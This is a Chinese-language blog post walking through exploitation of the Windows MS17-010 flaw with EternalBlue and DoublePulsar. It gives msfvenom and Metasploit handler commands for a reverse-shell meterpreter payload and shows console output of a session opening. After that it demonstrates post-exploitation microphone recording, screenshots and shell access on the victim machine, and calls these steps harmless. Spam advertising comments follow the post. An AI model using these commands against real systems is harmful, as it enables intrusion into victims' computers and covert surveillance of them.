MS17-010漏洞利用

虽然这个漏洞早在几个月前就放出。

但到了今天(5/13),发生了什么想必都已经知道了。

目前已知的,几乎所有 WIN 开头的系统都收到这个漏洞的影响。

本文,就讲一讲如何利用这个漏洞以及 EternalBlue 工具进行攻击。

(公网与内网渗透方法相似,这里就只讲内网渗透的方法)

一、环境

需要准备两台机器,一台 win 一台 linux,如果是自己测试还要准备一台 windows 靶机。

三台机器:攻击主机 A(windows7)、攻击主机 B(Ubuntu)、目标主机 C(windows7)

攻击机器 A 中需要配置 Python2 和 pywin32 环境,并配置好 Python2 的环境变量。

在攻击机器 A 中 git clone 我的代码:https://github.com/kyeremalprime/ms

在代码目录中的 /windows 目录下新建一个目录:listeningposts

二、渗透

1.在 Ubuntu 下配置 msf 的 payload:

  1. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.57.32 LPORT=5733 -f dll > /opt/test.dll   ##LHOST为攻击机器 B 的 IP,命令生成 dll 文件保存在/opt路径下

2.把生成的 dll 文件拷贝至攻击机器 A 的 C 盘根目录下。

3.在攻击机器 B 中开启 msfpaylod 监听。

  1. $ msfconsole
  2. msf > use exploit/multi/handler
  3. msf exploit(handler) > set lhost 192.168.57.32
  4. msf exploit(handler) > set lport 5733
  5. msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
  6. msf exploit(handler) > exploit
  7. [*] Started reverse handler on 180.105.236.64:5733
  8. [*] Starting the payload handler...

4.在攻击机器 A 上执行 kyeremal.py 脚本

MS17-010漏洞利用

5.设置目标机器的 IP 地址

MS17-010漏洞利用

这里的 Callback IP Address 就是 msf 中我们自己的模块里设置的地址。

6.创建一个新的 fb 项目

MS17-010漏洞利用

7.加载 EternalBlue 漏洞

MS17-010漏洞利用

8.EternalBlue 的配置

Mode 中选择的是框架,当然是用 FUZZBUNCN 框架啦~

9.漏洞利用成功

MS17-010漏洞利用

脚本执行至这里会有一个 feedback

10.利用 Doublepulsar 漏洞

MS17-010漏洞利用

11.获取 meterpreter 会话

  1. [*] Started reverse handler on 192.168.57.32:5733
  2. [*] Starting the payload handler...
  3. [*] Sending stage (1105970 bytes) to 192.168.57.33
  4. [*] Meterpreter session 2 opened (192.168.57.32:5733 -> 192.168.57.33:14267) at 2017-05-13 13:37:41 +0000
  5. meterpreter >

三、为所欲为

到这里,攻击机器 B 就完全渗透到了目标机器 C 中,获得了一个 meterpreter 会话。

那自然,想干什么就干什么咯。

来做一点无害的事吧~

比如说...对桌面录制和截图~

  1. meterpreter > webcam_list     ##启动 webcam 录屏工具
  2. 1: Citrix HDX Web Camera
  3. meterpreter > record_mic    ##录制屏幕
  4. [*] Starting...
  5. [*] Stopped
  6. Audio saved to: /usr/bin/r.wav    ##保存路径
  7. meterpreter > screenshot    ##截图
  8. Screenshot saved to: /usr/bin/z.jpeg   ##保存路径
  9. meterpreter >

然后进入目标机器 C 中查看是否成功

  1. meterpreter >shell  ##输入shell命令就可以进去目标机器了
  2. Process 924 created.
  3. Channel 1 created.
  4. Microsoft Windows 7
  5. C:\Windows\system32>cd c:\
  6. cd c:\
  7. c:\>

BINGO!!!!

只是要注意...入侵是偷,勒索是抢,自己玩玩就好了。

如果我的文章对您有帮助,请我喝杯咖啡吧~

支付宝转账打赏⬆️

微信钱包转账打赏⬆️

目前评论:4   其中:访客  4   博主  0

  1. 增达网 1

    增达网:
    ——————————
    终生只需99元,让百万人每天浏览你的广告,每次浏览十秒时间。

    终生只需99元,免费下载群发软件,无使用限制,全部是破解版。

    终生只需99元,让你什么不干躺着就赚钱,上线替下线发展会员。
    ——————————
    群发软件免费下,无限广告免费发,

    百万流量免费享,十级提成免费拿。
    ——————————
    注册网址:

    http://www.wo.zengda.xin/
    ——————————

  2. 某人博客 0

    申请友链,本站已添加贵站
    某人博客
    http://blog.mouren.org

  3. 我赚啦 2

    古人日三省其身,我从博客里吸收养分!

  4. 增达网 2

    受教了!呵呵!

评论加载中...

发表评论

:?::razz::sad::evil::!::smile::oops::grin::eek::shock::???::cool::lol::mad::twisted::roll::wink::idea::arrow::neutral::cry::mrgreen: